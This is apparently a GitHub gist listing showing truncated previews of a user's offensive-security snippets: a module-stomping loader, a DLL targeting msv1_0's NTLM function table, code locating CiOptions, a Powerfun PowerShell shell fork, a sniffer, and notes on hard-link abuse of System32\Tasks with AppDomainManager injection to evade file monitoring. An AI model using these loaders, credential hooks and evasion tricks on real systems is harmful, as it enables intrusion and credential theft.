View LOADER_SNIPPET_STOMP.c
MapImg = MemAllocateStomped( &fTable, ImgLen );
if ( !MapImg ) {
sParam.ImgMod = TRUE;
MapImg = MemAllocateVirtual( &fTable, ImgLen );
};
InlineZeroMemory( MapImg, ImgLen );
SecHdr = IMAGE_FIRST_SECTION( NtsHdr );
for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) {
realoriginal / dllmain.c
Last active Mar 6, 2020
Locate msv1_0!NtlmFunctionTable by parsing .rdata section.
View dllmain.c
#define _GNU_SOURCE
#define _WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <string.h>
#include <stdio.h>
#include "ssp.h"
BOOL
DllMain( _In_ HINSTANCE hInstance,
_In_ DWORD fdwReason,
realoriginal / .clang-format
Created Feb 24, 2020 — forked from jtippet/.clang-format
clang-format file to approximate Windows NT coding style for C++ drivers
View .clang-format
AccessModifierOffset: -4
AlignAfterOpenBracket: AlwaysBreak
AlignConsecutiveAssignments: false
AlignConsecutiveDeclarations: false
AlignEscapedNewlines: DontAlign
AlignOperands: true
AllowAllParametersOfDeclarationOnNextLine: false
AllowShortBlocksOnASingleLine: false
AllowShortCaseLabelsOnASingleLine: false
AllowShortFunctionsOnASingleLine: Inline
View ci.c
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#define PTR(x) ((ULONG_PTR)x)
LPVOID GetCiOptions1(LPVOID ImageBase)
{
HANDLE hCiLib;
LPVOID fCiInit;
View powerfun-fork.ps1
# Powerfun - Written by Ben Turner & Dave Hardy
# Forked for a few quick fixes.
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
}
View BUILDING_DROPBOX_PT1.md

HomeLab : Building an Alpine-Based (AARCH64) DropBox (pt 1)

I've been fascinated for a while by the idea of building my own home network, however with little time and somewhat being stubborn on the specifics I've pushed it off until most of the pieces come together. Nonetheless, I plan on documenting as much of the process as possible in hopes of keeping a "log", as well as hopefully teaching others as I learn. Probably impossible to teach something you know so little about, but you miss the shots you don't take, as they say.

Purpose of this bit is to construct an Alpine Linux-based dropbox running atop an SBC (Single-Board-Computer) to allow internal access into the network from anywhere (well, the ones I permit anyhow). For this, I've chosen:

View sniff.c
/*!
* spy.c
*
* I just wanna feel like I'm still living.
* - Eden "Rock & Roll"
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "spy.h"
realoriginal / Update_Notes.md
Created Aug 8, 2019
Loading .NET Assemblies into Script Hosts - Abusing System32||SysWow64\Tasks writable property
View Update_Notes.md

Using Hard Links to point back to attacker controlled location.

mklink /h C:\Windows\System32\Tasks\tasks.dll C:\Tools\Tasks.dll
Hardlink created for C:\Windows\System32\Tasks\tasks.dll <<===>> C:\Tools\Tasks.dll

This can redirect the search to an arbitrary location and evade tools that are looking for filemods in a particular location.

xref: https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

View Tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
View tasks.cs
This file has been truncated, but you can view the full file.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;